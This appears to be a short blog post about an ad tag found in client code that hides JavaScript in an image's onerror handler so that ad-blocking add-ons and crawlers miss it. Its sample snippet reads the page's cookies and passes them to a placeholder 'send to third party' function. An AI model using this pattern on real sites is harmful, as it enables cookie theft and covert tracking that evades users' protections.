Going through some client code, I found this little snippet. It appears to be their ad tag. Now, this wouldn't get around browser restrictions on JS or anything, but certainly this would bypass any browser add-ons which might try to remove unwelcome JS. This also wouldn't be seen by crawlers a first party might have to monitor such things *(depending on what the script does).
I'll remove the actual code, but the idea is just to set an error handler, and then cause an error.
<img src="data:imge/png,gotcha" onerror="var cookie=document.cookie; sendCookieToThirdParty(cookie);"></img>
Of course, I describe something malicious, but this could very much be used for legit purposes where the tag owner doesn't want their code blocked by AdBlock or equivalent.
No comments:
Post a Comment